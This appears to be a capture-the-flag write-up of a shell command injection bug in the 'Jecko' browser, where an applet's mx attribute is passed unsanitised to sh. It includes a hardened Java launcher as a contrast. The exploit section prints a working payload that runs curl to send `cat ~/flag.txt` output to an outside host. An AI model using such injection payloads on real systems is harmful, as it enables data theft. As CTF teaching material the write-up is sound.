Jecko 1-0
Finding Bugs
We were given 3 different versions of the Jecko browser so we compared their class files to see what changed. Only the Jecko class changed. We used JD-GUI to get Java source code from the class files and discovered that the visit method was modified quite a bit.
The Bug - Shell Command Injection
The bug appears when the browser attempts to run a Java applet on a webpage. The applet's own code runs in a limited security context, so it can't perform dangerous actions such as reading local files. However, the browser launches the Java applet by passing a shell command to sh. This opens up a world of possibilities: if we can control any part of that command string, we may be able to get additional commands to run by taking advantage of sh's semicolon operator.
Looking at the source code, we found that the mx attribute of the applet tag is improperly sanitized. The code only checks to ensure that the mx attribute contains a number followed by an "m" and that that number is between 16 and 128 inclusive. We can surround that number followed by "m" with whatever text we'd like. The mx attribute is included verbatim in the command that is passed to sh.
The following snippet shows how the browser passes the java command to sh, making it vulnerable to command injection:
String[] params = { "/bin/sh", "-c", "java -Xmx" + mxAttribute + " -Djava.security.manager" + " -cp " + directoryOfApplet + " " + appletName };
Runtime.getRuntime().exec(params);
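For contrast, here is a hardened launcher as an added example (not Jecko's code): the whole mx value must match digits followed by "m", the heap size is rebuilt from the parsed integer, and the argument vector is handed straight to java without sh -c, so the semicolon and pound sign never reach a shell. The class and method names are mine.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example, not part of the Jecko browser: strict validation of the
// applet's mx attribute plus a launcher that never involves a shell.
public final class AppletLauncher {
    // The entire attribute must be 1-3 digits followed by "m"; nothing
    // before or after is allowed, unlike the original "contains" check.
    private static final Pattern MX = Pattern.compile("^(\\d{1,3})m$");

    // Returns the heap size in megabytes, or -1 if the attribute is rejected.
    static int parseMx(String mx) {
        Matcher m = MX.matcher(mx);
        if (!m.matches()) {
            return -1;                 // "64m; curl ... #" is rejected here
        }
        int megabytes = Integer.parseInt(m.group(1));
        return (megabytes >= 16 && megabytes <= 128) ? megabytes : -1;
    }

    // Builds the argv for Runtime.exec. Each element is passed to the java
    // binary verbatim; no shell ever parses the applet's attributes.
    static String[] buildCommand(String mx, String appletDir, String appletName) {
        int megabytes = parseMx(mx);
        if (megabytes < 0) {
            throw new IllegalArgumentException("rejected mx attribute: " + mx);
        }
        return new String[] {
            "java",
            "-Xmx" + megabytes + "m",  // rebuilt from the parsed integer, not the raw text
            "-Djava.security.manager",
            "-cp", appletDir,
            appletName
        };
    }

    public static void main(String[] args) throws Exception {
        String[] ok = buildCommand("64m", "/tmp/applet", "Hello");
        System.out.println(String.join(" ", ok));
        // The attribute from the writeup's exploit page, now refused outright.
        String injected = "64m; curl http://10.0.3.50:7000/bots?t=rpisec\\&k=`cat ~/flag.txt` #";
        try {
            buildCommand(injected, "/tmp/applet", "Hello");
        } catch (IllegalArgumentException e) {
            System.out.println("blocked: " + e.getMessage());
        }
        // To launch for real: Runtime.getRuntime().exec(ok);
    }
}
```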
The Exploit
We began our mx attribute with "64m" to satisfy the validation code and then immediately ended the java command with a semicolon. Next we started our own command, which sent the user's flag to the judges. We ended the mx attribute with a pound sign to comment out the rest of the shell command that was created by the browser.
To exploit the bug, we included the following code on our webpage:
<applet code="Hello.class" mx="64m; curl http://10.0.3.50:7000/bots?t=rpisec\&k=`cat ~/flag.txt` #"></applet>
This applet tag steals and submits the user's flag to the judges as described above. Hello.class is just a Java program that prints "Hello". It never gets run, but it needs to exist and be downloadable by the browser to make the browser happy enough to reach the buggy code.
After visiting our webpage, the parameters that the browser sends to the exec method of a Runtime object look something like this:
String[] params = { "/bin/sh", "-c", "java -Xmx64m; curl http://10.0.3.50:7000/bots?t=rpisec\&k=`cat ~/flag.txt` # -Djava.security.manager -cp /tmp/jeckotmp273983720.applet Hello"};